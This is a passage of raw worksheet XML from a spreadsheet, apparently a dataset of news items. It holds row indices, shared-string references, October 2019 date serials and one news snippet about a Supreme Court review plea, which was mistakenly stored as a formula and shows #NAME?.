        <v>18347</v>
      </c>
      <c r="B18348">
        <v>3347</v>
      </c>
      <c r="C18348" t="s">
        <v>25497</v>
      </c>
      <c r="D18348" s="1">
        <v>43754</v>
      </c>
      <c r="F18348" t="s">
        <v>9975</v>
      </c>
      <c r="G18348" t="e">
        <f>- the Supreme Court on Wednesday reserved its order on the plea of a Tamil Nadu man seeking the review of its verdict upholding his...</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="18349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18349">
        <f t="shared" si="286"/>
        <v>18348</v>
      </c>
      <c r="B18349">
        <v>3348</v>
      </c>
      <c r="C18349" t="s">
        <v>25497</v>
      </c>
      <c r="D18349" s="1">
        <v>43754</v>
      </c>
      <c r="F18349" t="s">
        <v>9975</v>
      </c>
      <c r="G18349" t="s">
        <v>29825</v>
      </c>
    </row>
    <row r="18350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18350">
        <f t="shared" si="286"/>
        <v>18349</v>
      </c>
      <c r="B18350">
        <v>3349</v>
      </c>
      <c r="C18350" t="s">
        <v>25497</v>
      </c>
      <c r="D18350" s="1">
        <v>43747</v>
      </c>
      <c r="E18350" t="s">
        <v>25517</v>
      </c>
      <c r="F18350" t="s">
        <v>9975</v>
      </c>
      <c r="G18350" t="s">
        <v>29826</v>
      </c>
    </row>
    <row r="18351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18351">
        <f t="shared" si="286"/>
        <v>18350</v>
      </c>
      <c r="B18351">
        <v>3350</v>
      </c>
      <c r="C18351" t="s">
        <v>25497</v>
      </c>
      <c r="D18351" s="1">
        <v>43747</v>
      </c>
      <c r="E18351" t="s">
        <v>26742</v>
      </c>
      <c r="F18351" t="s">
        <v>10021</v>
      </c>
      <c r="G18351" t="s">
        <v>29827</v>
      </c>
    </row>
    <row r="18352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18352">
        <f t="shared" si="286"/>
        <v>18351</v>
      </c>
      <c r="B18352">
        <v>3351</v>
      </c>
      <c r="C18352" t="s">
        <v>25497</v>
      </c>
      <c r="D18352" s="1">
        <v>43740</v>
      </c>
      <c r="F18352" t="s">
        <v>9975</v>
      </c>
      <c r="G18352" t="s">
        <v>29828</v>
      </c>
    </row>
    <row r="18353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18353">
        <f t="shared" si="286"/>
        <v>18352</v>
      </c>
      <c r="B18353">
        <v>3352</v>
      </c>
      <c r="C18353" t="s">
        <v>25497</v>
      </c>
      <c r="D18353" s="1">
        <v>43741</v>
      </c>
      <c r="E18353" t="s">
        <v>29829</v>
      </c>
      <c r="F18353" t="s">
        <v>9975</v>
      </c>
      <c r="G18353" t="s">
        <v>29830</v>
      </c>
    </row>
    <row r="18354" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18354">
        <f t="shared" si="286"/>
        <v>18353</v>
      </c>
      <c r="B18354">
        <v>3353</v>
      </c>
      <c r="C18354" t="s">
        <v>25497</v>
      </c>
      <c r="D18354" s="1">
        <v>43754</v>
      </c>
      <c r="F18354" t="s">
        <v>9975</v>
      </c>
      <c r="G18354" t="s">
        <v>29831</v>
      </c>
    </row>
    <row r="18355" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18355">
        <f t="shared" si="286"/>
        <v>18354</v>
      </c>
      <c r="B18355">
        <v>3354</v>
      </c>
      <c r="C18355" t="s">
        <v>25497</v>
      </c>
      <c r="D18355" s="1">
        <v>43742</v>
      </c>
      <c r="E18355" t="s">
        <v>29832</v>
      </c>
      <c r="F18355" t="s">
        <v>9978</v>
      </c>
      <c r="G18355" t="s">
        <v>29833</v>
      </c>
    </row>
    <row r="18356" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18356">
        <f t="shared" si="286"/>
        <v>18355</v>
      </c>
      <c r="B18356">
        <v>3355</v>
      </c>
      <c r="C18356" t="s">
        <v>25497</v>
      </c>
      <c r="D18356" s="1">
        <v>43741</v>
      </c>
      <c r="E18356" t="s">
        <v>29834</v>
      </c>
      <c r="F18356" t="s">
        <v>9975</v>
      </c>
      <c r="G18356" t="s">
        <v>29835</v>
      </c>
    </row>
    <row r="18357" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18357">
        <f t="shared" si="286"/>
        <v>18356</v>
      </c>
      <c r="B18357">
        <v>3356</v>
      </c>
      <c r="C18357" t="s">
        <v>25497</v>
      </c>
      <c r="D18357" s="1">
        <v>43741</v>
      </c>
      <c r="F18357" t="s">
        <v>9975</v>
      </c>
      <c r="G18357" t="s">
        <v>29836</v>
      </c>
    </row>
    <row r="18358" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18358">
        <f t="shared" si="286"/>
        <v>18357</v>
      </c>
      <c r="B18358">
        <v>3357</v>
      </c>
      <c r="C18358" t="s">
        <v>25497</v>
      </c>
      <c r="D18358" s="1">
        <v>43742</v>
      </c>
      <c r="E18358" t="s">
        <v>25498</v>
      </c>
      <c r="F18358" t="s">
        <v>9975</v>
      </c>
      <c r="G18358" t="s">
        <v>29837</v>
      </c>
    </row>
    <row r="18359" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18359">
        <f t="shared" si="286"/>
        <v>18358</v>
      </c>
      <c r="B18359">
        <v>3358</v>
      </c>
      <c r="C18359" t="s">
        <v>25497</v>
      </c>
      <c r="D18359" s="1">
        <v>43750</v>
      </c>
      <c r="F18359" t="s">
        <v>9975</v>
      </c>
      <c r="G18359" t="s">
        <v>29838</v>
      </c>
    </row>
    <row r="18360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18360">
        <f t="shared" si="286"/>
        <v>18359</v>
      </c>
      <c r="B18360">
        <v>3359</v>
      </c>
      <c r="C18360" t="s">
        <v>25497</v>
      </c>
      <c r="D18360" s="1">
        <v>43749</v>
      </c>
      <c r="F18360" t="s">
        <v>9975</v>
      </c>
      <c r="G18360" t="s">
        <v>29839</v>
      </c>
    </row>
    <row r="18361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18361">
        <f t="shared" si="286"/>
        <v>18360</v>
      </c>
      <c r="B18361">
        <v>3360</v>
      </c>
      <c r="C18361" t="s">
        <v>25497</v>
      </c>
      <c r="D18361" s="1">
        <v>43749</v>
      </c>
      <c r="F18361" t="s">
        <v>9975</v>
      </c>
      <c r="G18361" t="s">
        <v>29840</v>
      </c>
    </row>
    <row r="18362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18362">
        <f t="shared" si="286"/>
        <v>18361</v>
      </c>
      <c r="B18362">
        <v>3361</v>
      </c>
      <c r="C18362" t="s">
        <v>25497</v>
      </c>
      <c r="D18362" s="1">
        <v>43751</v>
      </c>
      <c r="E18362" t="s">
        <v>25509</v>
      </c>
      <c r="F18362" t="s">
        <v>10021</v>
      </c>
      <c r="G18362" t="s">
        <v>29841</v>
      </c>
    </row>
    <row r="18363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18363">
        <f t="shared" si="286"/>
        <v>18362</v>
      </c>
      <c r="B18363">
        <v>3362</v>
      </c>
      <c r="C18363" t="s">
        <v>25497</v>
      </c>
      <c r="D18363" s="1">
        <v>43751</v>
      </c>
      <c r="E18363" t="s">
        <v>29842</v>
      </c>
      <c r="F18363" t="s">
        <v>9975</v>
      </c>
      <c r="G18363" t="s">
        <v>29843</v>
      </c>
    </row>
    <row r="18364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18364">
        <f t="shared" si="286"/>
        <v>18363</v>
      </c>
      <c r="B18364">
        <v>3363</v>
      </c>
      <c r="C18364" t="s">
        <v>25497</v>
      </c>
      <c r="D18364" s="1">
        <v>43740</v>
      </c>
      <c r="E18364" t="s">
        <v>25592</v>
      </c>
      <c r="F18364" t="s">
        <v>9975</v>
      </c>
      <c r="G18364" t="s">
        <v>29844</v>
      </c>
    </row>
    <row r="18365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18365">
        <f t="shared" si="286"/>
        <v>18364</v>
      </c>
      <c r="B18365">
        <v>3364</v>
      </c>
      <c r="C18365" t="s">
        <v>25497</v>
      </c>
      <c r="D18365" s="1">
        <v>43746</v>
      </c>
      <c r="E18365" t="s">
        <v>29845</v>
      </c>
      <c r="F18365" t="s">
        <v>9975</v>
      </c>
      <c r="G18365" t="s">
        <v>29846</v>
      </c>
    </row>
    <row r="18366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18366">
        <f t="shared" si="286"/>
        <v>18365</v>
      </c>
      <c r="B18366">
        <v>3365</v>
      </c>
      <c r="C18366" t="s">
        <v>25497</v>
      </c>
      <c r="D18366" s="1">
        <v>43745</v>
      </c>
      <c r="F18366" t="s">
        <v>9975</v>
      </c>
      <c r="G18366" t="s">
        <v>29847</v>
      </c>
    </row>
    <row r="18367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18367">
        <f t="shared" si="286"/>
        <v>18366</v>
      </c>
      <c r="B18367">
        <v>3366</v>
      </c>
      <c r="C18367" t="s">
        <v>25497</v>
      </c>
      <c r="D18367" s="1">
        <v>43747</v>
      </c>
      <c r="E18367" t="s">
        <v>29848</v>
      </c>
      <c r="F18367" t="s">
        <v>9975</v>
      </c>
      <c r="G18367" t="s">
        <v>29849</v>
      </c>
    </row>
    <row r="18368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18368">
        <f t="shared" si="286"/>
        <v>18367</v>
      </c>
      <c r="B18368">
        <v>3367</v>
      </c>
      <c r="C18368" t="s">
        <v>25497</v>
      </c>
      <c r="D18368" s="1">
        <v>43739</v>
      </c>
      <c r="E18368" t="s">
        <v>29850</v>
      </c>
      <c r="F18368" t="s">
        <v>9975</v>
      </c>
      <c r="G18368" t="s">
        <v>29851</v>
      </c>
    </row>
    <row r="18369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18369">
        <f t="shared" si="286"/>
        <v>18368</v>
      </c>
      <c r="B18369">
        <v>3368</v>
      </c>
      <c r="C18369" t="s">
        <v>25497</v>
      </c>
      <c r="D18369" s="1">
        <v>43740</v>
      </c>
      <c r="F18369" t="s">
        <v>9975</v>
      </c>
      <c r="G18369" t="s">
        <v>29852</v>
      </c>
    </row>
    <row r="18370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18370">
        <f t="shared" si="286"/>
        <v>18369</v>
      </c>
      <c r="B18370">
        <v>3369</v>
      </c>
      <c r="C18370" t="s">
        <v>25497</v>
      </c>
      <c r="D18370" s="1">
        <v>43755</v>
      </c>
      <c r="E18370" t="s">
        <v>25502</v>
      </c>
      <c r="F18370" t="s">
        <v>9975</v>
      </c>
      <c r="G18370" t="s">
        <v>29853</v>
      </c>
    </row>
    <row r="18371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18371">
        <f t="shared" ref="A18371:A18434" si="287">+ROW(A18370)</f>
        <v>18370</v>
      </c>
      <c r="B18371">
        <v>3370</v>
      </c>
      <c r="C18371" t="s">
        <v>25497</v>
      </c>
      <c r="D18371" s="1">
        <v>43748</v>
      </c>
      <c r="E18371" t="s">
        <v>29854</v>
      </c>
      <c r="F18371" t="s">
        <v>9975</v>
      </c>
      <c r="G18371" t="s">
        <v>29855</v>
      </c>
    </row>
    <row r="18372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18372">
        <f t="shared" si="287"/>
        <v>18371</v>
      </c>
      <c r="B18372">
        <v>3371</v>
      </c>
      <c r="C18372" t="s">
        <v>25497</v>
      </c>
      <c r="D18372" s="1">
        <v>43739</v>
      </c>
      <c r="E18372" t="s">
        <v>23123</v>
      </c>
      <c r="F18372" t="s">
        <v>9975</v>
      </c>
      <c r="G18372" t="s">
        <v>29856</v>
      </c>
    </row>
    <row r="18373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18373">
        <f t="shared" si="287"/>
        <v>18372</v>
      </c>
      <c r="B18373">
        <v>3372</v>
      </c>
      <c r="C18373" t="s">
        <v>25497</v>
      </c>
      <c r="D18373" s="1">
        <v>43743</v>
      </c>
      <c r="E18373" t="s">
        <v>29857</v>
      </c>
      <c r="F18373" t="s">
        <v>9975</v>
      </c>
      <c r="G18373" t="s">
        <v>29858</v>
      </c>
    </row>
    <row r="18374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18374">
        <f t="shared" si="287"/>
        <v>18373</v>
      </c>
      <c r="B18374">
        <v>3373</v>
      </c>
      <c r="C18374" t="s">
        <v>25497</v>
      </c>
      <c r="D18374" s="1">
        <v>43754</v>
      </c>
      <c r="E18374" t="s">
        <v>26458</v>
      </c>
      <c r="F18374" t="s">
        <v>10021</v>
      </c>
      <c r="G18374" t="s">
        <v>29859</v>
      </c>
    </row>
    <row r="18375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18375">
        <f t="shared" si="287"/>
        <v>18374</v>
      </c>
      <c r="B18375">
        <v>3374</v>
      </c>
      <c r="C18375" t="s">
        <v>25497</v>
      </c>
      <c r="D18375" s="1">
        <v>43747</v>
      </c>
      <c r="F18375" t="s">
        <v>9975</v>
      </c>
      <c r="G18375" t="s">
        <v>29860</v>
      </c>
    </row>
    <row r="18376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18376">
        <f t="shared" si="287"/>
        <v>18375</v>
      </c>
      <c r="B18376">
        <v>3375</v>
      </c>
      <c r="C18376" t="s">
        <v>25497</v>
      </c>
      <c r="D18376" s="1">
        <v>43742</v>
      </c>
      <c r="E18376" t="s">
        <v>27814</v>
      </c>
      <c r="F18376" t="s">
        <v>9975</v>
      </c>
      <c r="G18376" t="s">
        <v>29861</v>
      </c>
    </row>
    <row r="18377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18377">
        <f t="shared" si="287"/>
        <v>18376</v>
      </c>
      <c r="B18377">
        <v>3376</v>
      </c>
      <c r="C18377" t="s">
        <v>25497</v>
      </c>
      <c r="D18377" s="1">
        <v>43743</v>
      </c>
      <c r="E18377" t="s">
        <v>29862</v>
      </c>
      <c r="F18377" t="s">
        <v>9975</v>
      </c>
      <c r="G18377" t="s">
        <v>29863</v>
      </c>
    </row>
    <row r="18378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18378">
        <f t="shared" si="287"/>
        <v>18377</v>
      </c>
      <c r="B18378">
        <v>3377</v>
      </c>
      <c r="C18378" t="s">
        <v>25497</v>
      </c>
      <c r="D18378" s="1">
        <v>43754</v>
      </c>
      <c r="E18378" t="s">
        <v>29864</v>
      </c>
      <c r="F18378" t="s">
        <v>9975</v>
      </c>
      <c r="G18378" t="s">
        <v>29865</v>
      </c>
    </row>
    <row r="18379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18379">
        <f t="shared" si="287"/>
        <v>18378</v>
      </c>
      <c r="B18379">
        <v>3378</v>
      </c>
      <c r="C18379" t="s">
        <v>25497</v>
      </c>
      <c r="D18379" s="1">
        <v>43757</v>
      </c>
      <c r="E18379" t="s">
        <v>29866</v>
      </c>
      <c r="F18379" t="s">
        <v>9975</v>
      </c>
      <c r="G18379" t="s">
        <v>29867</v>
      </c>
    </row>
    <row r="18380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18380">
        <f t="shared" si="287"/>
        <v>18379</v>
      </c>
      <c r="B18380">
        <v>3379</v>
      </c>
      <c r="C18380" t="s">
        <v>25497</v>
      </c>
      <c r="D18380" s="1">
        <v>43741</v>
      </c>
      <c r="E18380" t="s">
        <v>25517</v>
      </c>
      <c r="F18380" t="s">
        <v>9975</v>
      </c>
      <c r="G18380" t="s">
        <v>29868</v>
      </c>
    </row>
    <row r="18381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18381">
        <f t="shared" si="287"/>
        <v>18380</v>
      </c>
      <c r="B18381">
        <v>3380</v>
      </c>
      <c r="C18381" t="s">
        <v>25497</v>
      </c>
      <c r="D18381" s="1">
        <v>43745</v>
      </c>
      <c r="E18381" t="s">
        <v>25517</v>
      </c>
      <c r="F18381" t="s">
        <v>9975</v>
      </c>
      <c r="G18381" t="s">
        <v>29869</v>
      </c>
    </row>
    <row r="18382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18382">
        <f t="shared" si="287"/>
        <v>18381</v>
      </c>
      <c r="B18382">
        <v>3381</v>
      </c>
      <c r="C18382" t="s">
        <v>25497</v>
      </c>
      <c r="D18382" s="1">
        <v>43742</v>
      </c>
      <c r="E18382" t="s">
        <v>25512</v>
      </c>
      <c r="F18382" t="s">
        <v>9975</v>
      </c>
      <c r="G18382" t="s">
        <v>29870</v>
      </c>
    </row>
    <row r="18383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18383">
        <f t="shared" si="287"/>
        <v>18382</v>
      </c>
      <c r="B18383">
        <v>3382</v>
      </c>
      <c r="C18383" t="s">
        <v>25497</v>
      </c>
      <c r="D18383" s="1">
        <v>43756</v>
      </c>
      <c r="F18383" t="s">
        <v>9975</v>
      </c>
      <c r="G18383" t="s">
        <v>29871</v>
      </c>
    </row>
    <row r="18384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18384">
        <f t="shared" si="287"/>
        <v>18383</v>
      </c>
      <c r="B18384">
        <v>3383</v>
      </c>
      <c r="C18384" t="s">
        <v>25497</v>
      </c>
      <c r="D18384" s="1">
        <v>43740</v>
      </c>
      <c r="E18384" t="s">
        <v>29872</v>
      </c>
      <c r="F18384" t="s">
        <v>9975</v>
      </c>
      <c r="G18384" t="s">
        <v>29873</v>
      </c>
    </row>
    <row r="18385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18385">
        <f t="shared" si="287"/>
        <v>18384</v>
      </c>
      <c r="B18385">
        <v>3384</v>
      </c>
      <c r="C18385" t="s">
        <v>25497</v>
      </c>
      <c r="D18385" s="1">
        <v>43745</v>
      </c>
      <c r="F18385" t="s">
        <v>9975</v>
      </c>
      <c r="G18385" t="s">
        <v>29874</v>
      </c>
    </row>
    <row r="18386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18386">
        <f t="shared" si="287"/>
        <v>18385</v>
      </c>
      <c r="B18386">
        <v>3385</v>
      </c>
      <c r="C18386" t="s">
        <v>25497</v>
      </c>
      <c r="D18386" s="1">
        <v>43739</v>
      </c>
      <c r="F18386" t="s">
        <v>10021</v>
      </c>
      <c r="G18386" t="s">
        <v>29875</v>
      </c>
    </row>
    <row r="18387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18387">
        <f t="shared" si="287"/>
        <v>18386</v>
      </c>
      <c r="B18387">
        <v>3386</v>
      </c>
      <c r="C18387" t="s">
        <v>25497</v>
      </c>
      <c r="D18387" s="1">
        <v>43742</v>
      </c>
      <c r="F18387" t="s">
        <v>9975</v>
      </c>
      <c r="G18387" t="s">
        <v>29876</v>
      </c>
    </row>
    <row r="18388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18388">
        <f t="shared" si="287"/>
        <v>18387</v>
      </c>
      <c r="B18388">
        <v>3387</v>
      </c>
      <c r="C18388" t="s">
        <v>25497</v>
      </c>
      <c r="D18388" s="1">
        <v>43756</v>
      </c>
      <c r="F18388" t="s">
        <v>9975</v>
      </c>
      <c r="G18388" t="s">
        <v>29877</v>
      </c>
    </row>
    <row r="18389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18389">
        <f t="shared" si="287"/>
        <v>18388</v>
      </c>
      <c r="B18389">
        <v>3388</v>
      </c>
      <c r="C18389" t="s">
        <v>25497</v>
      </c>
      <c r="D18389" s="1">
        <v>43747</v>
      </c>
      <c r="E18389" t="s">
        <v>25517</v>
      </c>
      <c r="F18389" t="s">
        <v>9975</v>
      </c>
      <c r="G18389" t="s">
        <v>29878</v>
      </c>
    </row>
    <row r="18390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18390">
        <f t="shared" si="287"/>
        <v>18389</v>
      </c>
      <c r="B18390">
        <v>3389</v>
      </c>
      <c r="C18390" t="s">
        <v>25497</v>
      </c>
      <c r="D18390" s="1">
        <v>43745</v>
      </c>
      <c r="F18390" t="s">
        <v>9975</v>
      </c>
      <c r="G18390" t="s">
        <v>29879</v>
      </c>
    </row>
    <row r="18391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18391">
        <f t="shared" si="287"/>
        <v>18390</v>
      </c>
      <c r="B18391">
        <v>3390</v>
      </c>
      <c r="C18391" t="s">
        <v>25497</v>
      </c>
      <c r="D18391" s="1">
        <v>43741</v>
      </c>
      <c r="E18391" t="s">
        <v>25517</v>
      </c>
      <c r="F18391" t="s">
        <v>9975</v>
      </c>
      <c r="G18391" t="s">
        <v>29880</v>
      </c>
    </row>
    <row r="18392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18392">
        <f t="shared" si="287"/>
        <v>18391</v>
      </c>
      <c r="B18392">
        <v>3391</v>
      </c>
      <c r="C18392" t="s">
        <v>25497</v>
      </c>
      <c r="D18392" s="1">
        <v>43748</v>
      </c>
      <c r="F18392" t="s">
        <v>9975</v>
      </c>
      <c r="G18392" t="s">
        <v>29881</v>
      </c>
    </row>
    <row r="18393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18393">
        <f t="shared" si="287"/>
        <v>18392</v>
      </c>
      <c r="B18393">
        <v>3392</v>
      </c>
      <c r="C18393" t="s">
        <v>25497</v>
      </c>
      <c r="D18393" s="1">
        <v>43752</v>
      </c>
      <c r="E18393" t="s">
        <v>25543</v>
      </c>
      <c r="F18393" t="s">
        <v>9975</v>
      </c>
      <c r="G18393" t="s">
        <v>29882</v>
      </c>
    </row>
    <row r="18394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18394">
        <f t="shared" si="287"/>
        <v>18393</v>
      </c>
      <c r="B18394">
        <v>3393</v>
      </c>
      <c r="C18394" t="s">
        <v>25497</v>
      </c>
      <c r="D18394" s="1">
        <v>43744</v>
      </c>
      <c r="F18394" t="s">
        <v>9975</v>
      </c>
      <c r="G18394" t="s">
        <v>29883</v>
      </c>
    </row>
    <row r="18395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18395">
        <f t="shared" si="287"/>
        <v>18394</v>
      </c>
      <c r="B18395">
        <v>3394</v>
      </c>
      <c r="C18395" t="s">
        <v>25497</v>
      </c>
      <c r="D18395" s="1">
        <v>43747</v>
      </c>
      <c r="E18395" t="s">
        <v>25509</v>
      </c>
      <c r="F18395" t="s">
        <v>10021</v>
      </c>
      <c r="G18395" t="s">
        <v>29884</v>
      </c>
    </row>
    <row r="18396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18396">
        <f t="shared" si="287"/>
        <v>18395</v>
      </c>
      <c r="B18396">
        <v>3395</v>
      </c>
      <c r="C18396" t="s">
        <v>25497</v>
      </c>
      <c r="D18396" s="1">
        <v>43757</v>
      </c>
      <c r="E18396" t="s">
        <v>29885</v>
      </c>
      <c r="F18396" t="s">
        <v>9975</v>
      </c>
      <c r="G18396" t="s">
        <v>29886</v>
      </c>
    </row>
    <row r="18397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18397">
        <f t="shared" si="287"/>
        <v>18396</v>
      </c>
      <c r="B18397">
        <v>3396</v>
      </c>
      <c r="C18397" t="s">
        <v>25497</v>
      </c>
      <c r="D18397" s="1">
        <v>43753</v>
      </c>
      <c r="E18397" t="s">
        <v>25509</v>
      </c>
      <c r="F18397" t="s">
        <v>9975</v>
      </c>
      <c r="G18397" t="s">
        <v>29887</v>
      </c>
    </row>
    <row r="18398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18398">
        <f t="shared" si="287"/>
        <v>18397</v>
      </c>
      <c r="B18398">
        <v>3397</v>
      </c>
      <c r="C18398" t="s">
        <v>25497</v>
      </c>
      <c r="D18398" s="1">
        <v>43742</v>
      </c>
      <c r="E18398" t="s">
        <v>25551</v>
      </c>
      <c r="F18398" t="s">
        <v>9975</v>
      </c>
      <c r="G18398" t="s">
        <v>29888</v>
      </c>
    </row>
    <row r="18399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18399">
        <f t="shared" si="287"/>
        <v>18398</v>
      </c>
      <c r="B18399">
        <v>3398</v>
      </c>
      <c r="C18399" t="s">
        <v>25497</v>
      </c>
      <c r="D18399" s="1">
        <v>43749</v>
      </c>
      <c r="E18399" t="s">
        <v>29889</v>
      </c>
      <c r="F18399" t="s">
        <v>9975</v>
      </c>
      <c r="G18399" t="s">
        <v>29890</v>
      </c>
    </row>
    <row r="18400" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18400">
        <f t="shared" si="287"/>
        <v>18399</v>
      </c>
      <c r="B18400">
        <v>3399</v>
      </c>
      <c r="C18400" t="s">
        <v>25497</v>
      </c>
      <c r="D18400" s="1">
        <v>43753</v>
      </c>
      <c r="F18400" t="s">
        <v>9978</v>
      </c>
      <c r="G18400" t="s">
        <v>29891</v>
      </c>
    </row>
    <row r="18401" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18401">
        <f t="shared" si="287"/>
        <v>18400</v>
      </c>
      <c r="B18401">
        <v>3400</v>
      </c>
      <c r="C18401" t="s">
        <v>25497</v>
      </c>
      <c r="D18401" s="1">
        <v>43749</v>
      </c>
      <c r="F18401" t="s">
        <v>9975</v>
      </c>
      <c r="G18401" t="s">
        <v>29892</v>
      </c>
    </row>
    <row r="18402" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18402">
        <f t="shared" si="287"/>
        <v>18401</v>
      </c>
      <c r="B18402">
        <v>3401</v>
      </c>
      <c r="C18402" t="s">
        <v>25497</v>
      </c>
      <c r="D18402" s="1">
        <v>43739</v>
      </c>
      <c r="E18402" t="s">
        <v>25502</v>
      </c>
      <c r="F18402" t="s">
        <v>9975</v>
      </c>
      <c r="G18402" t="s">
        <v>29893</v>
      </c>
    </row>
    <row r="18403" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18403">
        <f t="shared" si="287"/>
        <v>18402</v>
      </c>
      <c r="B18403">
        <v>3402</v>
      </c>
      <c r="C18403" t="s">
        <v>25497</v>
      </c>
      <c r="D18403" s="1">
        <v>43754</v>
      </c>
      <c r="E18403" t="s">
        <v>25506</v>
      </c>
      <c r="F18403" t="s">
        <v>9975</v>
      </c>
      <c r="G18403" t="s">
        <v>29894</v>
      </c>
    </row>
    <row r="18404" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18404">
        <f t="shared" si="287"/>
        <v>18403</v>
      </c>
      <c r="B18404">
        <v>3403</v>
      </c>
      <c r="C18404" t="s">
        <v>25497</v>
      </c>
      <c r="D18404" s="1">
        <v>43752</v>
      </c>
      <c r="E18404" t="s">
        <v>25592</v>
      </c>
      <c r="F18404" t="s">
        <v>9975</v>
      </c>
      <c r="G18404" t="s">
        <v>29895</v>
      </c>
    </row>
    <row r="18405" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18405">
        <f t="shared" si="287"/>
        <v>18404</v>
      </c>
      <c r="B18405">
        <v>3404</v>
      </c>
      <c r="C18405" t="s">
        <v>25497</v>
      </c>
      <c r="D18405" s="1">
        <v>43756</v>
      </c>
      <c r="F18405" t="s">
        <v>10021</v>
      </c>
      <c r="G18405" t="s">
        <v>29896</v>
      </c>
    </row>
    <row r="18406" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18406">
        <f t="shared" si="287"/>
        <v>18405</v>
      </c>
      <c r="B18406">
        <v>3405</v>
      </c>
      <c r="C18406" t="s">
        <v>25497</v>
      </c>
      <c r="D18406" s="1">
        <v>43757</v>
      </c>
      <c r="E18406" t="s">
        <v>29897</v>
      </c>
      <c r="F18406" t="s">
        <v>9975</v>
      </c>
      <c r="G18406" t="s">
        <v>29898</v>
      </c>
    </row>
    <row r="18407" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18407">
        <f t="shared" si="287"/>
        <v>18406</v>
      </c>
      <c r="B18407">
        <v>3406</v>
      </c>
      <c r="C18407" t="s">
        <v>25497</v>
      </c>
      <c r="D18407" s="1">
        <v>43756</v>
      </c>
      <c r="E18407" t="s">
        <v>25504</v>
      </c>
      <c r="F18407" t="s">
        <v>9975</v>
      </c>
      <c r="G18407" t="s">
        <v>29899</v>
      </c>
    </row>
    <row r="18408" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18408">
        <f t="shared" si="287"/>
        <v>18407</v>
      </c>
      <c r="B18408">
        <v>3407</v>
      </c>
      <c r="C18408" t="s">
        <v>25497</v>
      </c>
      <c r="D18408" s="1">
        <v>43740</v>
      </c>
      <c r="E18408" t="s">
        <v>29900</v>
      </c>
      <c r="F18408" t="s">
        <v>9975</v>
      </c>
      <c r="G18408" t="s">
        <v>29901</v>
      </c>
    </row>
    <row r="18409" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18409">
        <f t="shared" si="287"/>
        <v>18408</v>
      </c>
      <c r="B18409">
        <v>3408</v>
      </c>
      <c r="C18409" t="s">
        <v>25497</v>
      </c>
      <c r="D18409" s="1">
        <v>43741</v>
      </c>
      <c r="F18409" t="s">
        <v>9978</v>
      </c>
      <c r="G18409" t="s">
        <v>29902</v>
      </c>
    </row>
    <row r="18410" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18410">
        <f t="shared" si="287"/>
        <v>18409</v>
      </c>
      <c r="B18410">
        <v>3409</v>
      </c>
      <c r="C18410" t="s">
        <v>25497</v>
      </c>
      <c r="D18410" s="1">
        <v>43741</v>
      </c>
      <c r="F18410" t="s">
        <v>9978</v>
      </c>
      <c r="G18410" t="s">
        <v>29903</v>
      </c>
    </row>
    <row r="18411" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18411">
        <f t="shared" si="287"/>
        <v>18410</v>
      </c>
      <c r="B18411">
        <v>3410</v>
      </c>
      <c r="C18411" t="s">
        <v>25497</v>
      </c>
      <c r="D18411" s="1">
        <v>43748</v>
      </c>
      <c r="F18411" t="s">
